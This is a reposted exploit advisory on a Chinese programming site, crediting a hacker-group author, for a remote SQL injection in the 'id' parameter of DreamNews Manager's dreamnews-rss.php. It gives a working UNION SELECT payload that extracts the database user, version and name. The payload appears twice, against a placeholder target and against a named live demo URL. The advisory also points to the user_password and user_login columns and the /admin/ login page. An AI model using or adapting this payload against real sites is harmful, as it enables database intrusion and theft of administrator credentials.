欢迎来到福编程网,本站提供各种互联网专业知识!

DreamNews Manager (id) Remote SQL Injection Vulnerability

发布时间:1970-01-01 作者:佚名 来源:互联网
###########################################################dreamnews(rss)RemoteSQLInjectionVulnerability#========================================================#Author:HussinX=#
#########################################################

#

# dreamnews ( rss) Remote SQL Injection Vulnerability

#========================================================

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc =

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

#=========================================================

#

# script : http://dreamlevels.com/dreamnews.php

#

# DorK : N/A

#

##########################################################

Exploit:

www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

L!VE DEMO:

http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

column_name :

user_password

user_login

Admin Login :

/admin/

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

相关推荐